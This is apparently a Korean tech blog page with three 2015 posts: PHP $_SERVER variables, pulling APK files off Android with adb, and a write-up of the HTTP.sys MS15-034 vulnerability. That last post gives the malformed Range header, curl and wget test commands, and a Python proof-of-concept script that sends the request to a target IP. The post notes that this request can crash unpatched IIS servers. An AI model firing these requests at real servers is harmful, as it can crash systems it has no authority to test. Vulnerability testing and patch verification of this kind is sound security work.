5/31/2015

PHP $_SEVER를 이용한 서버, 웹 주소 정보 가져오기

1. $_SERVER 를 이용하여 웹 주소 정보 가져오기


<?

$hostname=$_SERVER["SERVER_NAME"];    // sever 정보 ex) www.codebalck.net
$hostname2=$_SERVER["HTTP_HOST"];    // host 정보 ex) www.codebalck.net
$uri= $_SERVER["REQUEST_URI"];          // uri 정보 ex) /2015/05/php-sever.html

?>

2. $_SERVER 주요 속성(elements)


'GATEWAY_INTERFACE'
What revision of the CGI specification the server is using; i.e. 'CGI/1.1'.
'SERVER_ADDR'
The IP address of the server under which the current script is executing.
'SERVER_NAME'
The name of the server host under which the current script is executing. If the script is running on a virtual host, this will be the value defined for that virtual host.
'SERVER_SOFTWARE'
Server identification string, given in the headers when responding to requests.
'SERVER_PROTOCOL'
Name and revision of the information protocol via which the page was requested; i.e. 'HTTP/1.0';
'REQUEST_METHOD'
Which request method was used to access the page; i.e. 'GET', 'HEAD', 'POST', 'PUT'.  

'REQUEST_TIME'
    The timestamp of the start of the request. Available since PHP 5.1.0.
'REQUEST_TIME_FLOAT'
    The timestamp of the start of the request, with microsecond precision. Available since PHP 5.4.0.
'QUERY_STRING'
    The query string, if any, via which the page was accessed.
'DOCUMENT_ROOT'
    The document root directory under which the current script is executing, as defined in the server's configuration file.
'HTTP_ACCEPT'
    Contents of the Accept: header from the current request, if there is one.
'HTTP_ACCEPT_CHARSET'
    Contents of the Accept-Charset: header from the current request, if there is one. Example: 'iso-8859-1,*,utf-8'.
'HTTP_ACCEPT_ENCODING'
    Contents of the Accept-Encoding: header from the current request, if there is one. Example: 'gzip'.
'HTTP_ACCEPT_LANGUAGE'
    Contents of the Accept-Language: header from the current request, if there is one. Example: 'en'.
'HTTP_CONNECTION'
    Contents of the Connection: header from the current request, if there is one. Example: 'Keep-Alive'.
'HTTP_HOST'
    Contents of the Host: header from the current request, if there is one.
'HTTP_REFERER'
    The address of the page (if any) which referred the user agent to the current page. This is set by the user agent. Not all user agents will set this, and some provide the ability to modify HTTP_REFERER as a feature. In short, it cannot really be trusted.
'HTTP_USER_AGENT'
    Contents of the User-Agent: header from the current request, if there is one. This is a string denoting the user agent being which is accessing the page. A typical example is: Mozilla/4.5 [en] (X11; U; Linux 2.2.9 i586). Among other things, you can use this value with get_browser() to tailor your page's output to the capabilities of the user agent.


Share: | Coffee Me:

5/27/2015

Extract .apk(android app) files from install Apps

adb 를 이용한 apk 파일 추출하기

adb shell 내 pm 명령을 이용하여 package 경로 확인이 가능하다.
경로 확인 후 pull 을 이용하여 apk 파일을 꺼내오면 된다.

설치된 package 경로 확인(find path)

# pm list packages -f
# pm list packages -f | grep camera                    
package:/system/app/FactoryCamera_FB/FactoryCamera_FB.apk=com.sec.factory.camera
package:/system/app/SamsungCamera3/SamsungCamera3.apk=com.sec.android.app.camera

.apk 파일 추출(extract apk file)

# adb pull / ~경로(path)
# adb pull /system/app/SamsungCamera3/SamsungCamera3.apk

Usage

 usage: pm list packages [-f] [-d] [-e] [-s] [-3] [-i] [-u] [FILTER]
       pm list permission-groups
       pm list permissions [-g] [-f] [-d] [-u] [GROUP]
       pm list instrumentation [-f] [TARGET-PACKAGE]
       pm list features
       pm list libraries
       pm path PACKAGE
       pm install [-l] [-r] [-t] [-i INSTALLER_PACKAGE_NAME] [-s] [-f]
                  [--algo <algorithm name> --key <key-in-hex> --iv <IV-in-hex>] PATH

       pm uninstall [-k] PACKAGE
       pm clear PACKAGE
       pm enable PACKAGE_OR_COMPONENT
       pm disable PACKAGE_OR_COMPONENT
       pm disable-user PACKAGE_OR_COMPONENT
       pm grant PACKAGE PERMISSION
       pm revoke PACKAGE PERMISSION
       pm set-install-location [0/auto] [1/internal] [2/external]
       pm get-install-location
       pm set-permission-enforced PERMISSION [true|false]
Share: | Coffee Me:

5/13/2015

HTTP.sys Remote Code Exploit(CVE-2015-1635/MS15-034) 취약점

최근 이슈가 됬었던 MS 보안패치 중 HTTP.sys Remote Code Exploit(CVE-2015-1635/MS15-034) 에 대한 이야기가 있었습니다.
공격자가 HTTP 헤더를 조작하여 취약한 시스템에 이상을 발생시키는 취약점이며 윈도우 계열 서버인 IIS에서 가능하며, 어느정도 이슈가 있었던 것으로 보입니다.

HTTP.sys 는 HTTP 요청을 처리하는 커널 모드 드라이버이며 해당 부분에서 integer overflow 를 통해 원격코드 실행이나 블루스크린 유발이 가능합니다.

CVSS 점수 (version 2.0)

CVSS v2 Base Score: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C) (legend)
Impact Subscore: 10.0
Exploitability Subscore: 10.0
CVSS Version 2 Metrics:
Access Vector: Network exploitable
Access Complexity: Low
Authentication: Not required to exploit
Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification; Allows disruption of service

취약 버전

+ Configuration 1
+ OR
* cpe:/o:microsoft:windows_7::sp1:x64
* cpe:/o:microsoft:windows_7::sp1:x86
* cpe:/o:microsoft:windows_server_2008:r2:sp1
* cpe:/o:microsoft:windows_8:-::~~~~x64~
* cpe:/o:microsoft:windows_8:-::~~~~x86~
* cpe:/o:microsoft:windows_8.1:-:-:~-~-~-~x64~
* cpe:/o:microsoft:windows_8.1:-:-:~-~-~-~x86~
* cpe:/o:microsoft:windows_server_2012:-:gold
* cpe:/o:microsoft:windows_server_2012:r2:-:~-~datacenter~~~
* cpe:/o:microsoft:windows_server_2012:r2:-:~-~essentials~~~
* cpe:/o:microsoft:windows_server_2012:r2:-:~-~standard~~~

Vulnerability


GET / HTTP/1.1
Host: vuln host
Range: bytes=0-18446744073709551615

웹 요청 시 위와 같이 Range에 숫자 값을 주어 UlAdjustRangesToContentSize 부분에 오버 플로우를 발생시킵니다. 오버플로우 발생 시 UlAdjustRangesToContentSize에 대한
길이 체크 부분에 대해 우회가 가능합니다.

공격방법이 간단하기 때문에 간단하게 스크립트를 작성하거나, curl, wget 등을 이용하여 테스트가 가능합니다.
curl -v [ipaddress]/ -H "Host: test" -H "Range: bytes=0-18446744073709551615"
wget -O /dev/null --header="Range: 0-18446744073709551615" http://[ip address]/

Python POC(http://pastebin.com/ypURDPc4)
-----
import socket
import random

ipAddr = ""
hexAllFfff = "18446744073709551615"

req1 = "GET / HTTP/1.0\r\n\r\n"
req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"

print "[*] Audit Started"
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req1)
boringResp = client_socket.recv(1024)
if "Microsoft" not in boringResp:
                print "[*] Not IIS"
                exit(0)
client_socket.close()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req)
goodResp = client_socket.recv(1024)
if "Requested Range Not Satisfiable" in goodResp:
                print "[!!] Looks VULN"
elif " The request has an invalid header name" in goodResp:
                print "[*] Looks Patched"
else:
                print "[*] Unexpected response, cannot discern patch status"

Share: | Coffee Me: